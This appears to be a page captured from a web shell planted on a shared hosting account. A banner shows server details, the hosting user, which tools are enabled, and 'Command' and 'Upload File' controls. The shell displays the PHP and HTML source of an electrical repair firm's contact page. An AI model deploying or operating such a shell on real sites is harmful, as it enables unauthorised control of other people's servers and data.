Server IP : 103.53.40.154 / Your IP : 3.135.204.43 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/ariseelectrical.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Contact us | Arise Electrical</title> <meta name="description" content="Visit Us | Shop no 8, Siddharth vihar residency, Siddharth Vihar, Pratap Vihar, Ghaziabad, UP 201009 | akrayeen12345@gmail.com | +91-9899711786"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous"> <link rel="stylesheet" type="text/css" href="style.css"> <style> #form{ border: 5px solid #fefefe; background-color: rgba(0, 0, 0, 0.6); } .form-header h2, .form-header p{ background-color: #fefefe; margin: 0; } .form-box{ width: 100%; padding:20px 10px 10px 10px; } #form input{ display: block; width: 100%; height: 45px; border: none; margin-bottom: 10px; border-radius: 12px; outline: none; padding-left: 26px; background-color: #0e0e0e; } /* input[type="text"]::placeholder , input [type="email"]::placeholder{ position: relative; left: 12px; align-items: center; } */ #form textarea{ display: block; width: 100%; height: 90px; border: none; margin-bottom: 10px; outline: none; border-radius: 12px; padding-left: 26px; padding-top: 25px; } #form button{ display: block; width: 100%; height: 40px; border: none; margin-bottom: 10px; border-radius: 12px; background-color: #bc1e1f; margin-bottom: 15px; transition: 0.3s; } #form button:hover{ color: white; background-color: #bc1e1f; } .form-box button{ color:#fefefe; } </style> </head> <body> <?php include 'header.php';?> <section id="contact-us"> <div class="container"> <div class="row contact-info"> <h1><center>Contact Us</center></h1> <div class="col-md-6 col-sm-6 col-xs-6 col-lg-6 contact-static"> <h1>Arise Electricals REPAIRING WORKS</h1> <h4><span>Address:</span> Shop No 18 Basement, ASR Plaza, Shahberi, Greater Noida, Ghaziabad, Uttar Pradesh, 201009</h4> <h4 style="color:black;"><a href="akrayeen12345@gmail.com"> akrayeen12345@gmail.com</a></h4> </div> <div class="col-md-6 col-sm-6 col-xs-6 col-lg-6 contact-form"> <form action="" id="form"> <span class="form-header"> <h2 class="text-center">QUICK ENQUIRY</h2> <p class="text-center"> QUICK CALL NOW <br> +91-8826171066 </p> </span> <div class="form-box"> <input type="text" name="" id="" placeholder="FULL NAME"> <input type="text" name="" id="" placeholder="EMAIL ID"> <input type="text" name="" id="" placeholder="PHONE NO."> <button type="submit">Submit</button> </div> </div> </div> </section> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script> </body> </html> <?php include 'footer.php';?>